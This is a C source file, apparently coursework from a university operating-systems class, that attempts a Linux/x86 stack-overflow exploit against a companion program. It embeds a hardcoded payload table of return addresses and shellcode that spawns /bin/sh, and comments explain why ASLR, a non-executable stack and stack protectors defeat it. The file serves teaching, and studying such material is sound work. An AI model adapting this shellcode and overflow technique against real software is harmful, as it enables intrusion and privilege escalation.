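/*
   file: exploit.c
   ---------------
   author: Ted Baker
   version: $Version$
   last modified by: $Author: cop4610 $
   on: $Date: 2002/08/21 19:28:41 $

   purpose: exploit the program vulnerable.c

   attempted demonstration of linux/x86 stack-modification exploit
   derived from xterm.Xaw exploit by alcuin - 5/4/98 -
   [ http://www.rootshell.com/ ]

   not quite working (yet)

   reading notes:
   The payload below is a table of fixed 32-bit words captured from one
   run of experiment4.c, so the demonstration is tied to the exact
   process layout of that run.  Anything that changes the layout or the
   way the stack is used in vulnerable.c (address-space layout
   randomisation, a non-executable stack, a compiler stack protector)
   invalidates those words, which is why those are the standard
   mitigations for this class of bug.
*/

/* NOTE(review): the header names were missing from this copy of the
   listing.  These three are inferred from the calls made below
   (fprintf/perror, errno, execve); confirm against the original file. */
#include <stdio.h>
#include <errno.h>
#include <unistd.h>

/* Defined before the include below, so presumably consumed by
   execwrapper.i (not shown here). */
#define EXEC_PROGRAM "/bin/ls"
#include "execwrapper.i"

/* Not referenced in the code visible in this file; possibly used by
   execwrapper.i. */
#define SAFETY_MARGIN 50

/* Argument vector for the target: argv[0] is the program name, argv[1]
   is filled in by main(), and the last slot is the terminating NULL. */
char *arg[] = {"vulnerable", NULL, NULL};

/* The target is started with an empty environment. */
char *env[] = {NULL};

/* values below captured from experiment4.c */
/* Several of these constants do not fit in a signed int, so the stored
   values rely on the implementation's unsigned-to-signed conversion;
   the element type is left as written in the original. */
int payload[] = {
  0xbffffa78, 0x4090b230, 0x4202bd50, 0x4211548a,
  0x4213030c, 0x40013020, 0xbffffa68, 0xbffffa60,
  0xb0e58955, 0x74123c56, 0xe812b007, 0xfffffff5,
  0xb0c0315e, 0x89c60125, 0xb0f789f3, 0xb0c70108,
  0x89c60105, 0x47f98937, 0x30474747, 0x890789c0,
  0xcd0bb0fa, 0x69622f80, 0x68732f6e, 0x40010000
};

/*
   Runs ./vulnerable with the payload table passed as its single
   command-line argument.

   The table is handed over as a char pointer, and execve reads every
   argv element as a NUL-terminated string.  An argument made of
   non-printable bytes like this one is visible to exec auditing, which
   is one place where an attempt of this kind can be detected.

   argc and argv are unused.

   Returns 1 if the exec fails; on success execve does not return, so
   there is no success path through the rest of this function.
*/
int main (int argc, char **argv)
{
  (void) argc;
  (void) argv;

  fprintf (stderr, "executing ./vulnerable\n");
  arg[1] = (char *) payload;

  execve ("./vulnerable", arg, env);

  /* Only reached when execve failed.  Save errno first: fprintf may
     overwrite it before perror gets to report it. */
  int saved_errno = errno;
  fprintf (stderr, "errno = %d\n", saved_errno);
  errno = saved_errno;
  perror ("exec failed");

  /* The original returned 0 here, reporting success to the caller even
     though the target was never started. */
  return 1;
}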